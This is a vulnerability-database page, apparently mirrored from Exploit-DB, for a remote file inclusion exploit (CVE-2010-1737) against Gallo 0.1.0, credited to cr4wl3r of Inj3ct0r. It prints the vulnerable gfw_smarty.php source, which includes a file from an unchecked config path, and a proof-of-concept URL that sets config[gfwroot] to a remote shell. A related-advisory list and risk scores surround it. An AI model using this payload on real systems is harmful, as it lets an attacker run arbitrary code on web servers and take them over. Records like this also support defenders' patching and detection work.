Lucene search
+L

Gallo 0.1.0 - Remote File Inclusion

🗓️ 03 May 2010 00:00:00Reported by cr4wl3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Gallo 0.1.0 Remote File Inclusion vulnerability with Gallo_pat

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-1737
3 May 201000:00
circl
CVE
CVE-2010-1737
6 May 201018:00
cve
Cvelist
CVE-2010-1737
6 May 201018:00
cvelist
EUVD
EUVD-2010-1757
7 Oct 202500:30
euvd
NVD
CVE-2010-1737
6 May 201018:30
nvd
OpenVAS
Gallo 'gfw_smarty.php' Remote File Include Vulnerability
6 May 201000:00
openvas
OpenVAS
Gallo <= 0.1.0 RFI Vulnerability
6 May 201000:00
openvas
Prion
Remote file inclusion
6 May 201018:30
prion
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |    Gallo 0.1.0 Remote File Include Vulnerability   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Homepage: http://h4ckb0x.org/
[!] Download Script: http://sourceforge.net/projects/gallo/
[!] Remote: yes

[!] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id
[!] Thanks to: str0ke, opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki,
           EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom,
           SENOT, devilbat, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[!] Code [gfw_smarty.php]:

<?php
/**
 * @filename index.php
 * @author Carlos Eduardo Sotelo Pinto
 * @date 2009-01-08
 */
include ($config['gfwroot'] . 'libs/smarty/Smarty.class.php');
class GfwSmarty extends Smarty {
	function GfwSmarty () {
		global $config;
		$this->Smarty();

		$this->template_dir  = $config['approot'] . 'sites/main/templates/';
		$this->compile_dir   = $config['approot'] . 'compiles/';
		$this->config_dir    = $config['approot'] . 'configs/';
		$this->cache_dir     = $config['approot'] . 'cache/';
		$this->compile_check = $config['compile'];
		$this->force_compile = $config['compile'];
		$this->caching       = $config['caching'];
		$this->assign('app_name', 'Maps');
	}
}
?>

[!] PoC:

[x] [Gallo_path]/core/includes/gfw_smarty.php?config[gfwroot]=[Shell]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 May 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.01967
25